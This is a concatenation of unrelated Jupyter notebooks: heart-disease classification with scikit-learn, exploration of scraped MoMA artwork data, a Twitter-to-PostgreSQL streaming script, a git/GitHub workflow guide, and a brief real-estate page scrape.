# save the model to disk
print("[INFO] Saving model...")
pickle.dump(model,open('cnn_model.pkl', 'wb'))
# -
|
DiseasePredictior/plant-disease-detection-using-keras (1).ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
import matplotlib.pyplot as plt # this is used for the plot the graph
import seaborn as sns # used for plot interactive graph.
from sklearn.ensemble import RandomForestClassifier
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import average_precision_score
from sklearn.model_selection import cross_val_score
from sklearn.metrics import precision_recall_curve
from sklearn.neighbors import KNeighborsClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.metrics import confusion_matrix
from sklearn.metrics import accuracy_score
from sklearn.naive_bayes import GaussianNB
from sklearn.metrics import roc_curve
from sklearn.metrics import f1_score
from sklearn.metrics import auc
from sklearn.svm import SVC
# %matplotlib inline
from IPython.core.interactiveshell import InteractiveShell
InteractiveShell.ast_node_interactivity = "all"
# ## Cause of Heart Disease
# 1. Excess weight, especially around the stomach area, increases a woman's risk of developing cardiovascular disease and lack of physical activity makes it worse.
# 2. Diabetes causes damage to blood vessels so diabetes is a major factor in developing cardiovascular disease.
# 3. Unhealthy foods, lack of exercise, lead to heart disease. So can high blood pressure, infections, and birth defects.
# 4. Smoking is one of the biggest causes of cardiovascular disease.
# 5. Just a few cigarettes a day can damage the blood vessels and reduce the amount of oxygen available in our blood.
# * But other things might surprise you.
# #### Loading the Data
df=pd.read_csv('heart.csv')
df.head(5)
# It's a clean, easy to understand set of data. However, the meaning of some of the column headers are not obvious. Here's what they mean,
#
# 1.age: The person's age in years
#
# 2.sex: The person's sex (1 = male, 0 = female)
#
# 3.cp: The chest pain experienced (Value 1: typical angina, Value 2: atypical angina, Value 3: non-anginal pain, Value 4: asymptomatic)
#
# 4.trestbps: The person's resting blood pressure (mm Hg on admission to the hospital)
#
# 5.chol: The person's cholesterol measurement in mg/dl
#
# 6.fbs: The person's fasting blood sugar (> 120 mg/dl, 1 = true; 0 = false)
#
# 7.restecg: Resting electrocardiographic measurement (0 = normal, 1 = having ST-T wave abnormality, 2 = showing probable or definite left ventricular hypertrophy by Estes' criteria)
#
# 8.thalach: The person's maximum heart rate achieved
#
# 9.exang: Exercise induced angina (1 = yes; 0 = no)
#
# 10.oldpeak: ST depression induced by exercise relative to rest ('ST' relates to positions on the ECG plot. See more here)
#
# 11.slope: the slope of the peak exercise ST segment (Value 1: upsloping, Value 2: flat, Value 3: downsloping)
#
# 12.ca: The number of major vessels (0-3)
#
# 13.thal: A blood disorder called thalassemia (3 = normal; 6 = fixed defect; 7 = reversable defect)
#
# 14.target: Heart disease (0 = no, 1 = yes)
#
df.describe()
# Describe function is a function that allows analysis between the numerical values contained in the data set. Using this function count, mean, std, min, max, 25%, 50%, 75%.
# As seen in this section, most values are generally categorized. This means that we need to integrate other values into this situation. These; age, trestbps, chol, thalach
df.shape
# Looking at information of heart disease risk factors led me to the following: high cholesterol, high blood pressure, diabetes, weight, family history and smoking 3. According to another source 4, the major factors that can't be changed are: increasing age, male gender and heredity. Note that thalassemia, one of the variables in this dataset, is heredity. Major factors that can be modified are: Smoking, high cholesterol, high blood pressure, physical inactivity, and being overweight and having diabetes. Other factors include stress, alcohol and poor diet/nutrition.
# Now,I will check null on all data and If data has null, I will sum of null data's. In this way, how many missing data is in the data.
#
df.isnull().sum()
# there are no missing data in this dataset
plt.figure(figsize=(10,10))
sns.heatmap(df.corr(),annot=True,fmt='.1f')
plt.show()
# from theabove corelation plot we see that cp(chest pain),thalch and slope are highly corelated with the target.
# # EDA (Exploratory Data Analysis)
# + _uuid="00af1961381609399dd80ca7c6a950277c120357"
df.target.value_counts()
# + _uuid="f0c639a82d794e41978199f7fa4405a01a7b805e"
sns.countplot(x="target", data=df, palette="bwr")
plt.show()
# + _uuid="dd20ffc31d87de07a6f2941b0500cda8c0b1b8e6"
countNoDisease = len(df[df.target == 0])
countHaveDisease = len(df[df.target == 1])
print("Percentage of Patients Haven't Heart Disease: {:.2f}%".format((countNoDisease / (len(df.target))*100)))
print("Percentage of Patients Have Heart Disease: {:.2f}%".format((countHaveDisease / (len(df.target))*100)))
# + _uuid="aca4074785c40bcf036a59c14c78e3a503904724"
sns.countplot(x='sex', data=df, palette="mako_r")
plt.xlabel("Sex (0 = female, 1= male)")
plt.show()
# + _uuid="8780860cb02768a3bf112a41ab67f1f6bebe9146"
countFemale = len(df[df.sex == 0])
countMale = len(df[df.sex == 1])
print("Percentage of Female Patients: {:.2f}%".format((countFemale / (len(df.sex))*100)))
print("Percentage of Male Patients: {:.2f}%".format((countMale / (len(df.sex))*100)))
# + _uuid="435f8691396c6f2b1a901809286eb64112126582"
df.groupby('target').mean()
# + _uuid="e0eed947b5490e93a43515ad6d2a6af9713f16ce"
pd.crosstab(df.age,df.target).plot(kind="bar",figsize=(20,6))
plt.title('Heart Disease Frequency for Ages')
plt.xlabel('Age')
plt.ylabel('Frequency')
plt.savefig('heartDiseaseAndAges.png')
plt.show()
# + _uuid="1cb0e9e4ec00ca7caa2e77a03dd0289e1c549708"
pd.crosstab(df.sex,df.target).plot(kind="barh",figsize=(15,6),color=['#1CA53B','#AA1111' ])
plt.title('Heart Disease Frequency for Sex')
plt.xlabel('Sex (0 = Female, 1 = Male)')
plt.xticks(rotation=0)
plt.legend(["Haven't Disease", "Have Disease"])
plt.ylabel('Frequency')
plt.show()
# + _uuid="e5fe0744106dc26475e2e0274081789518ad8a51"
plt.scatter(x=df.age[df.target==1], y=df.thalach[(df.target==1)], c="red")
plt.scatter(x=df.age[df.target==0], y=df.thalach[(df.target==0)])
plt.legend(["Disease", "Not Disease"])
plt.xlabel("Age")
plt.ylabel("Maximum Heart Rate")
plt.show()
# + _uuid="730062aa471d6774f0b761ad2cb6a7043d339615"
pd.crosstab(df.slope,df.target).plot(kind="bar",figsize=(15,6),color=['#DAF7A6','#FF5733' ])
plt.title('Heart Disease Frequency for Slope')
plt.xlabel('The Slope of The Peak Exercise ST Segment ')
plt.xticks(rotation = 0)
plt.ylabel('Frequency')
plt.show()
# + _uuid="3209c3a2fe67592b6ff6851327e98ac7606e14eb"
pd.crosstab(df.fbs,df.target).plot(kind="bar",figsize=(15,6),color=['#FFC300','#581845' ])
plt.title('Heart Disease Frequency According To FBS')
plt.xlabel('FBS - (Fasting Blood Sugar > 120 mg/dl) (1 = true; 0 = false)')
plt.xticks(rotation = 0)
plt.legend(["Haven't Disease", "Have Disease"])
plt.ylabel('Frequency of Disease or Not')
plt.show()
# + _uuid="10be6f01d184480eca7437799c214b4847fd3543"
pd.crosstab(df.cp,df.target).plot(kind="bar",figsize=(15,6),color=['#11A5AA','#AA1190' ])
plt.title('Heart Disease Frequency According To Chest Pain Type')
plt.xlabel('Chest Pain Type')
plt.xticks(rotation = 0)
plt.ylabel('Frequency of Disease or Not')
plt.show()
# -
# # Dummy variables
a = pd.get_dummies(df['cp'], prefix = "cp")
b = pd.get_dummies(df['thal'], prefix = "thal")
c = pd.get_dummies(df['slope'], prefix = "slope")
# + _uuid="50380d91358131ae6b852c9666e4da5c2e4dee66"
frames = [df, a, b, c]
df = pd.concat(frames, axis = 1)
df.head()
# + _uuid="01011d45333bde3d9f95e3db93ae4517c72a741f"
df = df.drop(columns = ['cp', 'thal', 'slope'])
df.head()
# -
X = df.drop(['target'], axis = 1)
y = df.target.values
# # Train & Test split
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state=0)
# # Scaling
from sklearn.preprocessing import StandardScaler
sc_X=StandardScaler()
X_train=sc_X.fit_transform(X_train)
X_test=sc_X.transform(X_test)
# # Building Predictive Model
#LogisticRegression
lr_c=LogisticRegression(random_state=0)
lr_c.fit(X_train,y_train)
lr_pred=lr_c.predict(X_test)
lr_cm=confusion_matrix(y_test,lr_pred)
lr_ac=accuracy_score(y_test, lr_pred)
print('LogisticRegression_accuracy:\t',lr_ac)
print('Confusion Matrix:\n', lr_cm)
#SVM classifier
svc_c=SVC(kernel='rbf')
svc_c.fit(X_train,y_train)
svc_pred=svc_c.predict(X_test)
sv_cm=confusion_matrix(y_test,svc_pred)
sv_ac=accuracy_score(y_test, svc_pred)
print('SVM_classifier_accuracy:\t',sv_ac)
print('Confusion Matrix:\n', sv_cm)
#Bayes
gaussian=GaussianNB()
gaussian.fit(X_train,y_train)
bayes_pred=gaussian.predict(X_test)
bayes_cm=confusion_matrix(y_test,bayes_pred)
bayes_ac=accuracy_score(bayes_pred,y_test)
print('Bayes_accuracy:\t\t\t',bayes_ac)
#RandomForest
rdf_c=RandomForestClassifier(n_estimators=10,criterion='entropy',random_state=0)
rdf_c.fit(X_train,y_train)
rdf_pred=rdf_c.predict(X_test)
rdf_cm=confusion_matrix(y_test,rdf_pred)
rdf_ac=accuracy_score(rdf_pred,y_test)
print('RandomForest_accuracy:\t\t',rdf_ac)
# DecisionTree Classifier
dtree_c=DecisionTreeClassifier(criterion='entropy',random_state=0)
dtree_c.fit(X_train,y_train)
dtree_pred=dtree_c.predict(X_test)
dtree_cm=confusion_matrix(y_test,dtree_pred)
dtree_ac=accuracy_score(dtree_pred,y_test)
print('DecisionTree_accuracy:\t\t',dtree_ac)
#KNN
knn=KNeighborsClassifier(n_neighbors=2)
knn.fit(X_train,y_train)
knn_pred=knn.predict(X_test)
knn_cm=confusion_matrix(y_test,knn_pred)
knn_ac=accuracy_score(knn_pred,y_test)
print('KNN_accuracy:\t\t\t',knn_ac)
print(knn_cm)
plt.figure(figsize=(15,10))
plt.subplot(2,3,1)
plt.title("LogisticRegression_cm")
sns.heatmap(lr_cm,annot=True,cmap="Blues",fmt="d",cbar=False)
plt.subplot(2,3,2)
plt.title("bayes_cm")
sns.heatmap(bayes_cm,annot=True,cmap="Oranges",fmt="d",cbar=False)
plt.subplot(2,3,3)
plt.title("RandomForest")
sns.heatmap(rdf_cm,annot=True,cmap="Blues",fmt="d",cbar=False)
plt.subplot(2,3,4)
plt.title("SVM_classifier_cm")
sns.heatmap(sv_cm,annot=True,cmap="Reds",fmt="d",cbar=False)
plt.subplot(2,3,5)
plt.title("DecisionTree_cm")
sns.heatmap(dtree_cm,annot=True,cmap="Blues",fmt="d",cbar=False)
plt.subplot(2,3,6)
plt.title("kNN_cm")
sns.heatmap(knn_cm,annot=True,cmap="Blues",fmt="d",cbar=False)
plt.show()
model_accuracy = pd.Series(data=[lr_ac,sv_ac,bayes_ac,rdf_ac,dtree_ac,knn_ac],
index=['LogisticRegression','SVM_classifier','Bayes',
'RandomForest','DecisionTree_Classifier','KNN'])
fig= plt.figure(figsize=(10,7))
model_accuracy.sort_values().plot.barh()
plt.title('Model Accracy')
|
Heart Disease Prediction/Heart Disease Prediction.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # More Explorations with MoMA Scrape
#
# 
#
# This notebook further explores web data scraped from the MoMA collection.
#
# The [previous notebook](https://github.com/tnakatani/python2_ccac/blob/master/wk_8/moma_scrape/moma_scrape.ipynb) explored scraped data of specific artists. This time, the script was revised to randomly sample artworks from the collection in order to explore trends in the larger collection.
#
# ## Step 1: Data Collection
#
# The [moma_scrape.py](moma_scrape.py) script created an artwork dataset with the following steps:
# 1. NumPy's [`randint`](https://numpy.org/doc/stable/reference/random/generated/numpy.random.randint.html?highlight=randint#numpy.random.randint) method creates a list of random integers.
# 2. The `ArtworkSoup` class contains a method `scrape`, which takes the integers as a parameter. The class subsequently builds a URL with the integer and makes a HTTP request. Both successful and unsuccessful HTTP calls are logged in a separate `scrape.log` file.
# 3. If the HTTP request is successful, the class instantiates a `BeautifulSoup` object, extracts relevant artwork data from the HTML and builds a data structure from it.
# 4. Once all HTTP calls are made, the resulting data structure is dumped to a CSV file.
#
# __One flaw in the method__: Each integer in the 300K list of random integer does not necessarily guarantee a a valid request. It was not clear to me how the MoMA site assigns these artwork URL IDs, so I attempted to throw a large number of a randomized sample and see how many valid requests I can receive. Using the scraping logs, I calculated the rate of 404 errors:
#
# ```python
# with open('scrape.log', 'r') as f:
# count = 0
# count_404 = 0
# for line in f:
# count += 1
# if 'INFO:root:404' in line:
# count_404 += 1
# print(f'Total HTTP requests resulting in 404 response: {count_404}')
# print(f'Total HTTP requests: {count}')
# print(f'Ratio of 404 response versus 200: {count_404/count*100:.2f}%')
#
# # Total requests resulting in 404: 17567
# # Total HTTP requests: 30000
# # Ratio of 404 response versus 200: 58.56%
# ```
#
# Thus, more than half of the 300K requests resulted in a 404 error!
# ## Step 2: Data Exploration
#
# Now that we have the scraped data, we can explore it as a dataframe.
import pandas as pd
import matplotlib.pyplot as plt
# %matplotlib inline
# +
# Import the CSV into a dataframe
df = pd.read_csv('data/artwork_data.csv', index_col=0)
# Always show all of the columns
pd.set_option('display.max_columns', None)
# View a sample of the data
df.sample(10).dropna(how='all', axis=1)
# -
# While scraping the data, I noticed that the artworks had a wide range in the amount of metadata - ranging from common keys (e.g. "artist", "title") to less common ("producer", "delineator").
# Inspect all the features of an artwork from the
df.keys()
# I also forgot to add a URL for each of the artworks. Since we have the artwork ID, we can concatenate that with the URL template
# Create a column of URLs from artwork IDs
url = f'https://www.moma.org/collection/works/'
df['url'] = df['id'].apply(lambda x: url + str(x))
df['url'].head()
# ### Sorting Values by Frequency
# A typical way to inspect categorical data like this is to calculate the relative occurrence of unique values. This will answer questions like, "What artist do we most frequently see in this dataset?" and more.
#
# Using `value_counts()` and `pd.concat()`, we can view both the raw count as well as the relative frequency of each unique value.
# Clean up the state/variant column as it causes the loop to break because of its slash
df = df.rename(columns={'state/variant':'state_variant'})
# Print value counts for each column, then save each aggregation as a CSV file.
for k in df.keys()[1:]:
# Assign both raw counts and relative frequencies to variables
count = df[k].value_counts(dropna=True)
freq = df[k].value_counts(normalize=True, dropna=True)
# Concatenate the two series into a dataframe
values_combined = pd.concat([count, freq], keys=['count','frequency'], axis=1)
# Save each dataframe as its own CSV file
values_combined.reset_index() \
.rename(columns={'index': k}) \
.to_csv(f'data/{k}.csv')
# Print results here
banner = f'{k.upper()} - Total Unique Values: {len(count)}'
print(banner)
print(values_combined.head(10), '\n')
# Some of the more interesting data points from the cursory view of the data:
# 1. __Pablo Picasso's__ works were the most represented, with a relative frequency of ~5%.
# 2. The most common artwork title is __"Vase"__, but the frequency distribution has quite a long tail.
# 3. The most common manufacturer is __Braun AG__ [wiki](https://en.wikipedia.org/wiki/Braun_(company)). [Here](https://www.moma.org/collection/works/3391) is an example of a Braun product they have in the collection.
# 4. The most common medium is a __lithograph__, and its most common printer is [__Mourlot__](https://en.wikipedia.org/wiki/Mourlot_Studios), a commercial print shop founded in 1852 by the Mourlot family and located in Paris, France.
# ### Grouping Dimensions for New Perspectives
#
# There are some data points that are easily observed by looking at value counts. We can dive a bit deeper into the data by grouping columns together.
#
# First off, we will be querying various keywords in each column, so let's make a simple helper function so we can type less repetitive commands:
def query_df(column, keyword):
"""Fuzzy match a dataframe column by a keyword
Return a clean dataframe by dropping columns with all NaNs.
"""
return df.loc[df[column].str.lower() \
.str.contains(keyword, na=False)] \
.dropna(how='all', axis=1)
# Using this function we can query data we saw in the value counts to the full artwork data.
#
#
# #### Exploring Artist Works
# For instance, let's take a look at all the artwork whose manufacturer is Braun:
# Query artwork manufactured by Braun
query_df('manufacturer', 'braun').head()
# [<NAME>](https://en.wikipedia.org/wiki/Dieter_Rams) is a famous industrial designer in the modern design world known for products he designed for the Braun company. Let's see what artwork they have by him:
dieter_rams = query_df('artist', '<NAME>')
dieter_rams.head()
# We can group the artworks by how they was added to the collection by referring to the "credit" column:
dieter_rams['credit'].value_counts()
# Let's see artworks printed by the Mourlot company:
mourlot = query_df('printer', 'mourlot')
mourlot
# There are 425 artworks printed by the Mourlot company. An interesting angle to look at this data is to investigate __how the artworks printed by Mourlot were acquired__ (by using the `credit` column), and __how many of each artist's work were acquired from the credited source__.
# Group the dataframe by donor and artist, then sort the result.
group = mourlot.groupby(['credit','artist'])['id']
group.count().reset_index().sort_values(by='id', ascending=False).head(10)
# Based on the query, the top three artworks printed by the Mourlot company acquired from the Lous E. Stern Collection were works by <NAME>, <NAME> and <NAME>.
# ## Step 3: Visualization
# This section shows the distribution of copyright owners among the scraped artwork data.
#
# ### Cleaning the Data
#
# Before visualization, I noticed that the copyright claims are prefixed by the year. Since I am only interested in the group entities, I will first clean the data by removing the copyright year string.
# This is how the data looks like at the time of scraping
df['copyright'].dropna().head(10)
# Remove the copyright year from the strings
cp = df['copyright'].str.extract('(?<=© [0-9]{4} )(.*)(?=/.*)')
# Concatenate the raw count and the relative frequency,
# and reset the index
cp_count = cp[0].value_counts(dropna=True)
cp_freq = cp[0].value_counts(normalize=True, dropna=True)
cp_concat = pd.concat([cp_count, cp_freq], keys=['count','frequency'], axis=1) \
.reset_index() \
.rename(columns={'index': 'copyright'})
# Now we have a workable dataframe with more meaningful value counts
cp_concat.head(10)
# ### Plotting the Data
#
# We can now transform the dataframe into a plot using matplotlib.
# +
# Plotting all the data is too long of a tail, shorten to top 20
cp_20 = cp_concat.head(20)
fig = plt.figure(figsize=(5,5))
plt.barh(cp_20['copyright'], width=cp_20['frequency']);
plt.title('Distribution of the Top 20 Copyright Owners from Scraped Artwork Data')
plt.ylabel('Copyright')
plt.xlabel('Relative Frequency')
# -
# The main finding is that more than half of the artwork that I scraped is copyrighted by the [Artist Rights Society (ARS)](https://arsny.com/) of New York.
#
# More info on the organization from their [wiki page](https://en.wikipedia.org/wiki/Artists_Rights_Society):
# > Artists Rights Society (ARS) is a copyright, licensing, and monitoring organization for visual artists in the United States. Founded in 1987, ARS is a member of the International Confederation of Societies of Authors and Composers and as such represents in the United States the intellectual property rights interests of over 80,000 visual artists and estates of visual artists from around the world (painters, sculptors, photographers, architects and others).
|
final_project/moma_scrape_exploration.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## Twitter Pull using Twython
# ### Author: <NAME>
# ### Additions: <NAME>
# ### Last Update Date: 4-16-21
# ### adding SQL
# +
from twython import Twython
twitter = Twython('',
'',
'',
'')
#twitter.get_home_timeline()
#twitter.search(q='@NBATopShot+AND+Giveaway')
# +
from twython import TwythonStreamer
import csv
import codecs
import json
import time
# Filter out unwanted data
def process_tweet(tweet):
d = {}
d['hashtags'] = [hashtag['text'] for hashtag in tweet['entities']['hashtags']]
d['tweet_id'] = tweet['id']
d['created_at'] = tweet['created_at']
d['text'] = tweet['text']
d['name'] = tweet['user']['name']
d['user'] = tweet['user']['screen_name']
d['user_id'] = tweet['user']['id']
d['user_loc'] = tweet['user']['location']
d['user_desc'] = tweet['user']['description']
d['user_followers'] = tweet['user']['followers_count']
d['user_friends'] = tweet['user']['friends_count']
d['user_listed'] = tweet['user']['listed_count']
d['user_created'] = tweet['user']['created_at']
d['user_favs'] = tweet['user']['favourites_count']
d['user_verified'] = tweet['user']['verified']
d['user_statuses'] = tweet['user']['statuses_count']
return d
# Create a class that inherits TwythonStreamer
class MyStreamer(TwythonStreamer):
# Received data
def on_success(self, data):
# Save full JSON to file
with open('topGiveaway.json', 'w') as jsonfile:
json.dump(data, jsonfile)
# Only collect tweets in English
if data['lang'] == 'en':
tweet_data = process_tweet(data)
self.write_to_pgadmin(tweet_data)
#would call mongo function here to write it to the database
# Problem with the API
def on_error(self, status_code, data):
print(status_code, data)
self.disconnect()
# Save each tweet to csv file
def save_to_csv(self, tweet):
with open('topgiveaway.csv', 'a', encoding="utf8") as file:
writer = csv.writer(file)
writer.writerow(list(tweet.values()))
def write_to_pgadmin(self,tweet):
import psycopg2
conn = psycopg2.connect(host="localhost",
database="top-twit-mapping",
port=5432,
user='postgres',
password=<PASSWORD>)
cur = conn.cursor()
tweet = tweet
# insert user information
command = '''INSERT INTO twitter_user (realname,username,user_id,user_loc,user_desc,user_followers,user_friends,user_listed,user_created,user_favs,user_verified,user_statuses) VALUES (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s) ON CONFLICT
(user_id) DO NOTHING;'''
cur.execute(command,(tweet['name'],tweet['user'],tweet['user_id'],tweet['user_loc'],tweet['user_desc'],tweet['user_followers'],tweet['user_friends'],tweet['user_listed'],tweet['user_created'],tweet['user_favs'],tweet['user_verified'],tweet['user_statuses']))
command2 = '''INSERT INTO twitter_tweet (tweet_id,created_at,tweet,user_id) VALUES (%s,%s,%s,%s) ON CONFLICT
(tweet_id) DO NOTHING;'''
cur.execute(command2,(tweet['tweet_id'],tweet['created_at'],tweet['text'],tweet['user_id']))
conn.commit()
cur.close()
conn.close()
while True:
try:
# Instantiate from our streaming class
stream = MyStreamer('','','','')
# Start the stream
stream.statuses.filter(track='@NBATopShot,Giveaway') #Track uses comma separated list
except (KeyboardInterrupt):
print('Exiting')
break
except Exception as e:
print("error - sleeping " + str(e))
time.sleep(60)
continue
# -
|
toSQL.ipynb
|
# -*- coding: utf-8 -*-
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .sh
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Bash
# language: bash
# name: bash
# ---
# <div id="body">
# <center>
# <a href="08 Conflicts.ipynb"> <font size="8"> < </font></a>
# <a href="index.ipynb"> <font size="6"> Version Control with Git </font> </a>
# <font size="6"> > </font>
# </center>
# </div>
# # **Notes on the use of GIT and GitHub**
# + [markdown] toc-hr-collapsed=false
# ## **One time only**
# -
# ### **Fork**
#
# First fork the ORG/repository in the GitHub UI to your_GH_account. This is the same as what GitHub documentation suggests. See: [Fork a repo](https://help.github.com/en/articles/fork-a-repo) and [Syncing a fork](https://help.github.com/en/articles/syncing-a-fork) in GitHub help.
#
# Note: add SSH key, see [GitHub documentation](https://help.github.com/en/articles/connecting-to-github-with-ssh).
#
# #### **Origin**
#
# ```bash
# # "origin" points to your fork repo (e.g. forked from git@github.com:org/repository.git) - IMPORTANT
# git clone git@github.com:your_GH_account/repository.git
# ```
# ### **Remote**
# ```bash
# # add "upstream" remote
# cd repository/
# git remote add upstream <EMAIL>:org/repository.git
#
# git remote -v
# # you should see something like
# origin git@github.com:your_GH_account/repository.git (fetch)
# origin <EMAIL>:your_GH_account/repository.git (push)
# upstream <EMAIL>:org/repository.git (fetch)
# upstream <EMAIL>:org/repository.git (push)
# ```
# + [markdown] toc-hr-collapsed=false
# ## **Working with git**:
#
#
# -
# ### Editing
# ```bash
# # <make local source code changes>
# vim ...
# ```
#
#
# ### `git fetch`
# ```bash
# # fetch all branches from all remotes
# git fetch --all
# ```
#
#
# ### `git branch`
# ```bash
# # list existing branches
# git branch -a
# ```
#
#
# ### `git checkout`
# ```bash
# # create new local branch (pick a new name for feature_branch_name)
# git checkout -b feature_branch_name
# ```
#
#
# ### `git status`
# ```bash
# # list local changes
# git status
# ```
#
#
# ### `git add`
# ```bash
# # add files and/or changes into the repository
# git add file1.c file2.py ...
# ```
#
# ### `git commit`
# ```bash
# # commit
# git commit -m 'my change with reasonable explanation...'
# ```
# ### `git push`
# ```bash
# # push feature branch to origin, i.e. your fork of the org/repository repo
# git push origin feature_branch_name
# ```
# + [markdown] toc-hr-collapsed=true
# ### Pull Request
#
# * create pull request in GitHub Web interface (the link is then shown in the terminal)
#
# * during PR review phase, make more local changes if needed
#
# ```bash
# git add .
# git commit -m 'my second change'
# git push origin feature_branch_name
# # ..... will be added to existing pull request
# ```
#
# * NOTE: for different pull requests, simply create different feature branches.
#
# -
# ## **Keep your local source code up to date**
#
# [from https://github.com/OSGeo/gdal/blob/master/CONTRIBUTING.md#working-with-a-feature-branch]
#
# You may need to resynchronize against master if you need some bugfix or new capability that has been added since you created your branch
#
# ### `git rebase`
# ```bash
# # assuming that "upstream" points to org/repository
# git fetch upstream
# git rebase upstream/master
# ```
#
# ### `git stash`
# ```bash
# # if rebase fails with "error: cannot rebase: You have unstaged changes...", then move your uncommitted local changes to "stash"
# git stash
# # now you can rebase
# git rebase upstream/master
# # apply your local changes on top
# git stash apply && git stash pop
# ```
#
# Continue do your changes and commit/push them (ideally to a feature branch, see above).
#
#
# + [markdown] toc-hr-collapsed=true
# ## Working on private repository
#
# Assuming you are working on your own repository, then direct can be used (instead of forking and PR):
#
# ### One time only:
#
# ```bash
# # "origin" points to your repo - no fork needed
# git clone git@github.com:your_GH_account/repository.git
# ```
#
# ### **Work with git:**
#
# ```bash
# # <make local source code changes>
# vim ...
#
# # list local changes
# git status
# git add file1.c file2.py ...
# git commit -m 'my change with reasonable explanation...'
#
# # assuming that "origin" points to your_git_account/repository
# git fetch origin
# # IMPORTANT - ALWAYS REBASE IN ORDER TO AVOID NOT NEEDED MERGE COMMITS (!!!)
# git rebase origin/master
#
# # push feature branch to origin, i.e. directly to your_git_account/repository
# git push origin
# ```
#
# #### **Switching between branches**
# For an elegant way of multi-branches in separate directories with only a single repo clone, see
#
# * https://lists.osgeo.org/pipermail/grass-dev/2019-May/092653.html
#
# * Fixing bugs in a release branch
#
# To directly fix bugs (ideally via feature branch), do
#
# ```bash
# # push to release_branch, we assume it to be checked out
#
# # M_m (Major, minor version number: i.e.: V 1.3)
# cd releasebranch_M_m/
# # be sure to locally have all updates from server
# git fetch --all
# git branch --merged
#
# # create feature branch
# git checkout -b rMm_fix_xxx
#
# # ... do changes...
#
# git status
# git add ...
# git commit -m 'useful commit msg...'
#
# # push to feature branch
# git push upstream rMm_fix_xxx
#
# # create PR in GitHub UI. IMPORTANT: switch there to release_branch_X_Y!
#
# # ... after review, merge:
#
# # switch to release branch
# git checkout releasebranch_M_m
#
# # be sure to locally have all updates
# git fetch --all
# git branch --merged
#
# git branch -D changelog_fix_msg_Mm
# git fetch --all --prune
# git branch -a
# ```
#
# #### **Backporting to release branches**
# * **Preparation**
# If you checked out the release branch into a separate directory, be sure to have "upstream" enabled as a remote:
#
# ```bash
# git remote -v
# # if upstream is missing, execute
# git remote add upstream <EMAIL>:org/repository.git
# ```
#
# #### **Backporting of a single commit**
#
# ```bash
# git checkout master
# # With git log, identify the sha1sum of the commit you want to backport (example: into releasebranch_M_m)
# git log
#
# # switch to branch
# git checkout releasebranch_M_m
#
# # first update local repo
# git pull origin releasebranch_M_m --rebase
#
# # now backport the commit (edit conflicts if needed)
# git cherry-pick the_sha1_sum
#
# # push backport to upstream
# git push upstream releasebranch_M_m
# ```
#
# See also https://github.com/OSGeo/gdal/blob/master/CONTRIBUTING.md#backporting-bugfixes-from-master-to-a-stable-branch
#
# #### **Backporting of a merged pull request from master**
# Same as "Backporting of single commits" but with multiple git cherry-pick .... Importantly, in the right order.
#
# TODO: there must be a better way!!
#
# #### **Made a mess? Fix it**
#
# Example: mess happened on releasebranch_M_m:
#
# ```bash
# git reset --hard upstream/releasebranch_M_m
# git pull upstream releasebranch_M_m --rebase
# # now all should be clean again
# ```
#
#
# #### **Merging of Pull Requests**
#
# Rationale: We should try to have clean history and good commit messages. This helps really a lot when you try to understand why something is implemented the way it is.
#
# When a Pull Requests (PR) has multiple commits, the merge commit is more or less mandatory because if you don't have it, you can't use `git revert`.
#
# #### **PR with single commit**
# Proposed: when a PR only has a single commit, the "merge commit" doesn't offer anything and it can be avoided by rebasing the feature branch:
#
# Workflow: GitHub > button "Merge pull request" > "Rebase and merge"
#
# Next, you may locally delete the feature branch.
#
# #### **PR with multiple commits**
#
# #### **Proposed**: it is a good idea to try to squash the accumulated commits in a PR before merging, especially if those are trivial fixes.
#
# As an example, PRxx contains 5 commits. Esp. in case that several commits of them are trivial fixes that only add noise to the history, "squashing" those results in a cleaner history and, among other things, makes it easier to use `git bisect` and `git blame`.
#
# Importantly, not always commits of each and every PR need to be squashed before merging. When extensive changes are being made, it often makes sense to keep them unsquashed (e.g. to make reviewing easier), but trivial fixes should still be squashed to the main commits.
#
# Further reading
# Git Cheatsheet: http://ndpsoftware.com/git-cheatsheet.html#loc=workspace; (click on a field to see the related git commands)
# GDAL contributing: https://github.com/OSGeo/gdal/blob/master/CONTRIBUTING.md
#
#
# -- Those notes are heavly based on https://trac.osgeo.org/grass/wiki/HowToGit and should be considered as a draft/working-progress starting point on how to make good use of GIT.
#
#
# -
# <div id="body">
# <center>
# <a href="08 Conflicts.ipynb"> <font size="4"> < </font></a>
# <a href="index.ipynb"> <font size="4"> Version Control with Git </font> </a>
# <font size="4"> > </font>
# </center>
# </div>
|
09 Git Tips.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
## we firstly send request to the server.
from bs4 import BeautifulSoup
import requests
page=requests.get('https://www.nobroker.in/property/sale/bangalore/Electronic%20City?type=BHK4&searchParam=W3sibGF0IjoxMi44N%20DUyMTQ1LCJsb24iOjc3LjY2MDE2OTUsInBsYWNlSWQiOiJDaElKdy1GUWQ0cHNyanNSSGZkYXpnXzhYRW8%20iLCJwbGFjZU5hbWUiOiJFbGVjdHJvbmljIENpdHkifV0=&propertyAge=0&radius=2.0')
page
soup= BeautifulSoup(page.content)
nan=soup.find('h2',class_="heading-6 font-semi-bold nb__25Cl7")
nan
nan.text
square_feet=soup.find('div',class_="nb__FfHqA")
square_feet
square_feet.text
house_title=soup.find('h2',class_="heading-6 font-semi-bold nb__25Cl7")
house_title
house_title.text
location=soup.find('div',class_="nb__1EwQz")
